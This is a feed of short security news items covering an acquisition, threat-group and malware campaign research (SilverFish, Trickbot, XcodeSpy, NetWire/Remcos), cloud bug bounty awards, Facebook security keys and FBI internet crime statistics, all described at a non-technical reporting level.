Information Technology

VMware on Thursday announced it plans to acquire Mesh7, a company that secures cloud-native applications and miroservices by monitoring application behavior at the API layer. The terms of the deal were not disclosed.  Once the acquisition is finalized, VMware plans to integrate Mesh7’s contextual API behavior security product with the VMware Tanzu Service Mesh. The integration “will enable VMware to deliver high fidelity understanding of which applications components are talking to which using APIs,” Tom Gillis, VMware SVP and GM of the Networking and Security Business Unit, wrote in a blog post. “Developers and Security teams will each gain a better understanding of when, where and how applications and microservices are communicating via APIs, even across multi-cloud environments, enabling better DevSecOps.”The Mesh7 solution is based on Envoy, an open-source Layer 7 proxy designed for large, modern service-oriented architectures. Envoy is also a foundational component of Tanzu Service Mesh. “Early on, VMware realized Envoy would become the platform for next-generation security services,” Gillis wrote. More

Cyberattackers involved in worldwide hacking campaigns are using the compromised systems of high-profile victims as playgrounds to test out malicious tool detection rates. 

On Thursday, Swiss cybersecurity firm Prodaft said that SilverFish (.PDF), an “extremely skilled” threat group, has been responsible for intrusions at over 4,720 private and government organizations including “Fortune 500 companies, ministries, airlines, defense contractors, audit and consultancy companies, and automotive manufacturers.”Attacks are geared toward US and European entities and there is a specific focus on critical infrastructure and targets with a market value of over $100 million.   SilverFish been connected to the recent SolarWinds breach as “one of many” threat groups taking advantage of the situation, in which malicious SolarWinds Orion updates were pushed to customers, leading to the compromise of thousands of corporate networks.  In December, following the disclosure of the SolarWinds breach, Prodaft received an analysis request from a client and created a fingerprint based on public Indicators of Compromise (IoCs) released by FireEye.  After running IPv4 scans, the team found new detections within 12 hours and then began combing the web for command-and-control servers (C2s) used in the operation while refining fingerprint records. Prodaft says that after obtaining entry to the management C2 control panel, the company was able to verify links to existing SolarWinds security incidents and known victims by way of IP, username, command execution, country, and timestamp records.  Victims verified by the company include a US military contractor, a top COVID-19 testing kit manufacturer, aerospace and automotive giants, multiple police networks, European airport systems, and “dozens” of banking institutions in the US and Europe. 

SilverFish is focused on network reconnaissance and data exfiltration and uses a variety of software and scripts for both initial and post-exploitation activities. These include readily-available tools such as Empire, Cobalt Strike, and Mimikatz, as well as tailored rootkits, PowerShell, BAT, and HTA files. Prodaft says that SilverFish attackers tend to follow particular behavioral patterns while enumerating domains, including running commands to list domain controllers and trusted domains, as well as displaying stored credentials and admin user accounts.   Scripts are then launched for post-exploit reconnaissance and data theft activities. Hacked, legitimate domains are sometimes used to reroute traffic to the C2. However, perhaps the most interesting tactic observed is the use of existing enterprise victims as a sandbox.  “The SilverFish group has designed an unprecedented malware detection sandbox formed by actual enterprise victims which enables the adversaries to test their malicious payloads on victim servers with different enterprise AV and EDR solutions, further expanding the high success rate of the SilverFish group attacks,” the company says.  The C2 panel also revealed some interesting hints about how SilverFish operates. Panels are set for “Active teams” and appear to account for multiple groups such as Team 301, 302, 303, and 304, with both English and Russian used to write comments on victim records.  Work hours appear to stay within 8 am – 8 pm UTC, with far less activity taking place on weekends. Attacker teams seem to cycle every day or so between victims and whenever a new target is snared, the server is assigned to a particular working group for examination.  A ‘test run’ of the SolarWinds Orion compromise was conducted in 2019, whereas Sunburst malware was deployed to clients between March and June 2020. SilverFish-SolarWinds attacks began at the end of August 2020 and were conducted in three waves that only ended with the seizure and sinkhole of a key domain. However, the team expects other spying and data theft-related attacks to continue throughout 2021.SilverFish infrastructure has also revealed links to multiple IoCs previously attributed to TrickBot, EvilCorp, WastedLocker, and DarkHydrus. Prodaft cautions that “security analysts should not fully-automize their threat intelligence protocols [..] as acting strictly upon IoC intelligence from third-party resources may be one of the main reasons that prevent researchers from realizing the actual scope of large-scale APT attacks.” “SilverFish are still using relevant machines for lateral movement stages of their campaigns,” the company added. “Unfortunately, despite being large critical infrastructure, most of their targets are unaware of the SilverFish group’s presence on their networks.” As a “very sensitive matter,” Prodaft told ZDNet that victims were not contacted directly. However, the firm’s findings have been shared “with all responsible CERTs, and different law enforcement agencies; so that they can get in touch with the victims as the authorized body and share their findings.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

A new spear-phishing campaign is attempting to infect PCs with Trickbot, one of the most prevalent and potent forms of malware around today, a joint advisory from the FBI and Cybersecurity and Infrastructure Security Agency (CIA) has warned. Trickbot started life as a banking trojan but has become one of the most powerful tools available to cyber criminals, who are able to lease out access to infected machines in order to deliver their own malware – including ransomware. Now its authors are using a new tactic to attempt to deliver it to victims, warns the joint FBI and CISA alert – phishing emails which claim to contain proof of a traffic violation. The hope is that people are scared into opening the email to find out more. The malicious email contains a link which sends users to a website hosted on a server compromised by the attackers which tells the victim to click on a photo to see proof. They click the photo, they actually download a JavaScript file which, when opened, connects to a command and control server which will download Trickbot onto their system.Trickbot creates a backdoor onto Windows machines, allowing the attackers to steal sensitive information including login credentials, while some versions of Trickbot are capable of spreading itself across entire networks. SEE: A winning strategy for cybersecurity (ZDNet special report) | Download the report as a PDF (TechRepublic)The modular nature of Trickbot means it’s highly customisable, with additional attacks by the malware known to include dropping further malware – such as Ryuk or Conti ransomware – or until recently, serving as a downloader for Emotet malware. Trickbot is also able to exploit infected machines for cryptomining.

A coalition of cybersecurity companies attempted to disrupt Trickbot in October last year, but the malware didn’t stay quiet for long, with its cyber criminal authors quickly able to resume their operations. “The takedown efforts in October were unlikely to permanently disrupt or disable this very capable commodity malware that has been active on the threat landscape at scale for years. It has a strong infrastructure and the ability to continue operating,” Sherrod DeGrippo, senior director of threat research and detection at Proofpoint told ZDNet.”To completely remove Trickbot from the landscape would be extremely difficult and likely require a coordinated international law enforcement effort like we saw with Emotet. In fact, after the actions of October 2020, we saw Trickbot campaigns resume within weeks, and it has been active continually since,” she added.Trickbot remains a powerful tool for cyber criminals and a clear danger for enterprises and organisations of all sizes – but there are measures recommended by CISA and the FBI which can be taken in order help protect networks from the malware.Providing social engineering and phishing email to employees can help them to avoid threats by being wary of certain types of messages. Organisations should also be implementing a proper cybersecurity programme with a formalised security patch management process so cyber attacks can’t exploit known vulnerabilities to gain a foothold on the network. It’s also recommended that multi-factor authentication is applied across the enterprise, so malware which steals login credentials to move across the network can’t do so as easily.MORE ON CYBERSECURITY More

Google has announce the winners of its $313,337 2020 Google Cloud Platform (GCP) bug bounty prize that was split among just six security researchers. This was the second year Google has run the GCP vulnerability reward program and offered six researchers a share of $313,337, or triple the $100,000 pool it created for the 2019 program. The prizes go to researchers who’ve submitted reports on exceptional security flaws in GCP. So this isn’t a reward for a bug bounty, but an additional prize and recognition for submissions to Google’s vulnerability reward program.  

More on privacy

The first prize of an impressive $133,337 in the 2020 GCP program went to Ezequiel Pereira, a Uruguayan university student and security enthusiast, who found a remote code execution (RCE) flaw in the Google Cloud Deployment Manager. SEE: Security Awareness and Training policy (TechRepublic Premium)Google paid the $133,337 prize to Pereira on top of a $31,337 reward for the original report he submitted last year, meaning he’s landed $164,674 for this one report. “The bug discovered by Ezequiel allowed him to make requests to internal Google services, authenticated as a privileged service account,” writes Harshvardhan Sharma, an information security engineer at Google. It is a server-side request forgery (SSRF) attack.  Pereira started exploring Deployment Manager API methods by enabling it on the Google Cloud Console. From there he went to the metrics page of the console and looked at the Filters section to view a a list called Methods, where he found two documented API versions called “v2” and “v2beta”, and also two undocumented API versions called “alpha” and “dogfood”.   

The “dogfood” API piqued his interest because he knew Google uses the term “dogfooding” for its own teams using their software products internally before releasing them to the public. The second prize of $73,331 went to David Nechuta for another SSRF bug in Google Cloud Monitoring that could be used to leak the authentication of the service account used for the service’s uptime check feature. The prize is on top of $31,000 he received for the original report.  SEE: Cybercrime groups are selling their hacking skills. Some countries are buyingThe third prize of $73,331 was awarded to Dylan Ayrey and Allison Donovan for the report and write-up Fixing a Google Vulnerability. They pointed out issues in the default permissions associated with some of the service accounts used by GCP services.Other recipients included Bastien Chatelard for his report and write-up Escaping GKE gVisor sandboxing using metadata; Brad Geesaman for his report and write-up CVE-2020-15157 “ContainerDrip” Write-up; and Chris Moberly for the report and write-up Privilege Escalation in Google Cloud Platform’s OS Login. More

Facebook is finally expanding its support of physical security keys to mobile devices, the company announced Thursday. Facebook has supported security keys on desktop since 2017 and will now enable iOS and Android users to log in to their account via the physical key.

A security key is a device that generates an encrypted, one-time security code for use in two-factor authentication (2FA) systems. Modern security keys support a variety of hardware formats, such as USB-A and USB-C, Lightning for iPhone users, and even Bluetooth.In most cases, security codes for 2FA are sent to a user’s phone via text-based SMS message. But security keys go the route of hardware-based authentication, requiring an actual physical device that’s inserted into a device as a second form of identification.Security keys are thought to be more effective at preventing phishing attacks and data breaches than 2FA via SMS, because even if someone’s credentials are compromised, account login is impossible without that physical key.In addition to expanding support for security keys to mobile, Facebook said it also plans to expand its Facebook Protect program availability globally and add more groups outside of political campaigns and candidates in the coming year. The social media giant launched Facebook Protect in 2019 in the US.Facebook doesn’t manufacture its own security keys but is encouraging users to purchase them directly from vendors.Also: Best VPN service in 2021: Safe and fast don’t come free | Best security key in 2021

“Since 2017, we’ve encouraged people that are at high risk of being targeted by malicious hackers: politicians, public figures, journalists and human rights defenders,” Facebook said in a blog post. “We strongly recommend that everyone considers using physical security keys to increase the security of their accounts, no matter what device they use.” More

Malicious Xcode projects are being used to hijack developer systems and spread custom EggShell backdoors. 

The malware, dubbed XcodeSpy, targets Xcode, an integrated development environment (IDE) used in macOS for developing Apple software and applications.According to research published by SentinelLabs on Thursday, the Run Script feature in the IDE is being exploited in targeted attacks against iOS developers by way of Trojanized Xcode projects freely shared online.  Legitimate, open source Xcode projects can be found on GitHub. However, in this case, XcodeSpy projects are offering “advanced features” for animating iOS tab bars — and once the initial build is downloaded and launched, a malicious script is deployed to install the EggShell backdoor.  The malicious project explored by the researchers is a ripped version of TabBarInteraction, a legitimate project that has not been compromised.  The Run script of the IDE has been quietly tampered with to connect an attacker’s command-and-control (C2) server to a developer’s project. In particular, Apple’s IDE functionality that allows custom shell scripts to deploy on launching an instance of an app is the subject of abuse.  The C2 is then contacted by the script to pull and download a custom variant of the EggShell backdoor, which installs a user LaunchAgent for persistence.

Two variants of EggShell have been detected — and one of which shares an encrypted string with XcodeSpy.  The backdoor is able to hijack the victim developer’s microphone, camera, and keyboard, as well as grab and send files to the attacker’s C2. SentinelLabs says that at least one US organization has been caught up in attacks of this nature and developers in Asia may have also succumbed to the campaign, which was in operation at least between July and October last year.  Samples of the backdoors were uploaded to VirusTotal on August 5 and October 13. XcodeSpy was first uploaded on September 4, however, the researchers suspect the attacker may have uploaded the sample themselves in order to test detection rates.  “While XcodeSpy appears to be directly targeted at the developers themselves rather than developers’ products or clients, it’s a short step from backdooring a developer’s working environment to delivering malware to users of that developer’s software,” the researchers say. “Consequently, all Apple developers are cautioned to check for the presence of malicious Run scripts whenever adopting third-party Xcode projects.”  Back in August, Trend Micro tracked XCSSET malware in Xcode projects, thought to have been spread to compromise Safari browser sessions for phishing, cross-site scripting (XSS) attacks, and the theft of developer data.  The team said the discovery ultimately led to a “rabbit hole of malicious payloads.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Researchers have analyzed an active campaign targeting US taxpayers in order to spread both NetWire and Remcos Trojans. 

The tax season is now upon us and as US residents file their returns ahead of a deadline in April, this is also a prime time for cybercriminals to launch campaigns tailored to take advantage of the annual requirement. Phishing campaigns, unless they are nothing more than mass spray-and-pray attempts, will usually hook on a particular theme or situation to try and elicit enough of a reaction to fool a victim into clicking a malicious link or downloading a malware-laden attachment.  Examples include a ‘fraud’ alert from a bank, demands for student loan repayments, fake criminal investigations by the IRS, or notices from legitimate companies such as PayPal warning of unauthorized transactions.  When it comes to tax season, personal finance-themed phishing emails often include tax return-related content, and this is the hook that the active campaign’s operators have chosen to use.  According to research published by Cybereason on Thursday, the phishing messages come with documents attached that utilize malicious macros to deploy both NetWire and Remcos Remote Access Trojans (RATs).  Phishing document samples revealed that once opened, the content will blur and victims are asked to enable macros and editing in order to view the text. If they accept, a “heavily obfuscated” macro drops a malicious .DLL payload — a dropper for one of the two Trojans — in the /temp directory. 

The .DLL is then injected into Notepad software and the infection chain continues with the decryption of payload data via an XOR key in order to free up executable code. A connection to a command-and-control (C2) server is established and the OpenVPN client is downloaded, together with a side-loaded trojanized .DLL to maintain remote persistence.  This side-loaded .DLL is responsible for unpacking another .DLL, loaded into memory, and injecting it into Notepad. Another package is then pulled from the legitimate image hosting service imgur, and this package — hidden within an image file in a technique known as steganography — is one of either of the Trojans.  Remcos and NetWire RAT functionality includes taking screenshots, keylogging, stealing browser logs and clipboard data, file harvesting, the theft of OS information, and the ability to download and execute additional malware.  The RATs are both commercially available in underground forums and are offered on a cheap Malware-as-a-Service (MaaS) subscription basis, available for as little as $10 per subscription — which keeps the potential criminal customer base of the Trojan variants large.  “The use of various techniques such as steganography, storing payloads on legitimate cloud-based services, and exploiting DLL sideloading against a legitimate software makes these campaigns very difficult to detect,” commented Assaf Dahan, Cybereason head of threat research. “The sensitive information collected from the victims can be sold in the underground communities and used to carry out all manner of identity theft and financial fraud.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Americans lost over $4.2 billion to cybercriminals and scammers in 2020, according to FBI figures based on complaints it received.  Over the year, the FBI’s Internet Crime Center (IC3) received 791,790 complaints of suspected internet crime, or about 300,000 more than it did in 2019 when the agency recorded estimated losses at more than $3.5 billion. 

More on privacy

“In 2020, while the American public was focused on protecting our families from a global pandemic and helping others in need, cyber criminals took advantage of an opportunity to profit from our dependence on technology to go on an Internet crime spree,” the FBI says in its Internet Crime Report 2020.  SEE: Network security policy (TechRepublic Premium) Once again, business email compromise (BEC) or email account compromise (EAC) were by far the biggest sources of reported losses, totaling $1.8 billion across 19,369 complaints. That’s up slightly from $1.77 billion in reported losses from 23,775 BEC complaints in 2019. Last year saw a steep rise in BEC complaints stemming from identity theft and funds being converted into cryptocurrency.  The identity theft frequently occurred after a victim provided a form of ID to a tech support scammer or romance scammers. The stolen ID would be used to set up a bank account to receive stolen BEC funds and convert those to a less traceable cryptocurrency, according to IC3. 

The technique and switch to cryptocurrency differs from previous years when a senior executive’s email address may have been spoofed and used to instruct a subordinate to wire funds to the fraudster’s bank account.  The FBI report notes that tech support fraud continues to be a growing problem, but recently victims have complained about criminals posing as customer support for banks, utility companies or virtual currency exchanges.  While the pandemic caused a brief lull in this type of fraud, losses in this category grew to $146 million, or 171% more than losses from 2019. IC3 received 15,421 complaints from victims in 60 countries.  Ransomware is the other threat that won’t go away. The IC3 received 2,474 complaints and reported losses of $29.1 million. The report, however, notes that this is an underestimate as it doesn’t account for does victim reports made directly to FBI field offices and agents.   “The FBI does not encourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Paying the ransom also does not guarantee that a victim’s files will be recovered,” the FBI stresses in the report.  SEE: Phishing: These are the most common techniques used to attack your PC The most common type of internet crime type reported to IC3 was phishing (including vishing, smishing, and pharming), with 241,342 complaints. This was more than twice the number of phishing complaints IC3 received in 2019.     Notable rises in reported losses from specific crime types when comparing years (2019 versus 2020) included: confident fraud/romance ($475 million versus $600 million); corporate data breach ($53 million versus $129 million); investment fraud ($222 million versus $336 million); personal data breach ($120 million versus $194 million); ransomware ($8.8 million versus $29 million); and tech support ($54 million versus $146 million).  More